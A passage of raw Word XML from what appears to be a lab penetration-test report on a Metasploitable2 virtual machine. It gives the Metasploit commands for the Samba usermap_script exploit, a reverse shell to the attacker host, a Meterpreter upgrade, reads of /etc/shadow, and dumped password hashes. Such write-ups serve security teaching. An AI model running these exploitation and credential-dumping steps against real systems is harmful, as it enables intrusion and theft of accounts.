                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5592DCC6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Samba smbd 3.X – 4.X (ports 139/445)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21492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8A0D072">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Metasploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D96CCD3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>exploit/multi/samba/usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C03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797DD6C2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DE81DB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Unauthenticated Remote Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C6B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0B4EDE2D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A0ABCF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22DB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1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="4CC4E873">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26C6BD27">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>A misconfiguration in Samba's “usermap script” option allows attacker-supplied input to be passed unsanitized to the system shell, enabling arbitrary command execution as the Samba service user (root on Metasploitable2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A03A5C3">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D88BD2">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The exploit was configured and launched in Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5953E">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msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search usermap_script</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813C707">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The exploit succeeded immediately, opening a reverse TCP command shell back to the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF8C0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 Started reverse TCP handler on 192.168.56.101:4444</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] Command shell session 1 opened (192.168.56.101:4444 -&gt; 192.168.56.106:60130)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D887C64">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is a classic reverse shell: rather than the attacker connecting inbound to the target, the target was made to initiate an outbound connection back to a listener on the attacker's machine, handing over an interactive command shell. This technique is commonly used because outbound connections are less likely to be blocked by basic firewall rules than inbound ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7ECA20">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.5 Upgrading to a Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C62466">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The initial command shell provided only basic Linux command execution. To enable advanced post-exploitation capabilities (system enumeration, credential extraction, etc.), the session was upgraded to a full Meterpreter session using Metasploit's built-in post-exploitation module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA28240">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background</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set SESSION 1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411BB815">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The module uploaded and staged a Meterpreter payload through the existing shell, establishing a second, more capable reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C624B77">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 Meterpreter session 2 opened (192.168.56.101:4433 -&gt; 192.168.56.106:42182)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371A286">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The new session was then interacted with directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED42C4">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sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598D3B5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6. Phase 4: Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338632E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6.1 vsftpd Backdoor Session – Command Shell Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6D5B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With root access confirmed via the vsftpd backdoor, the following commands were run inside the compromised shell to verify and document the level of access obtained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1459A47D">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id</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls -la /root</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633EA5A">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB2579">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id confirmed uid=0(root) gid=0(root) – full administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EC355">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hostname and uname -a confirmed the shell was running on the Metasploitable2 target, not the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E66B718">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ifconfig displayed the target's own network interface (192.168.56.106), verifying the session was remote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015678CA">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/etc/passwd was readable, exposing the full list of system user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2031D">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/etc/shadow (normally restricted to root) was successfully read, providing definitive proof of root-level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBA362">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/root was fully accessible, meaning an attacker could read, modify, or delete any file on the system, install persistence mechanisms, or pivot further into the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB77649">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6.2 Samba / Meterpreter Session – Post-Exploitation Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307C54A">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With an active Meterpreter session established, standard Meterpreter post-exploitation commands were run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8B717">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sysinfo</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>load priv</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2E2DF">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sysinfo returned full target host details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D623C7">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Computer     : metasploitable.localdomain</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Architecture : i686</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Meterpreter  : x86/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E589FEC">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>getuid confirmed the session was running with full administrative rights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794B913">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Server username: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BF262">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The built-in hashdump command required Meterpreter's “priv” extension, which is only supported on Windows payloads and was unavailable on this Linux target (“load priv” failed as expected). The Linux-specific equivalent Metasploit post-exploitation module was used instead to extract the password hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919CC05">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background</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use post/linux/gather/hashdump</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set SESSION 2</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BD8D7">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This successfully dumped the full unshadowed password file, combining /etc/passwd and /etc/shadow into a single readable hash list for every system account, and automatically saved a copy to a Metasploit loot file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CB958">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres:$1$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
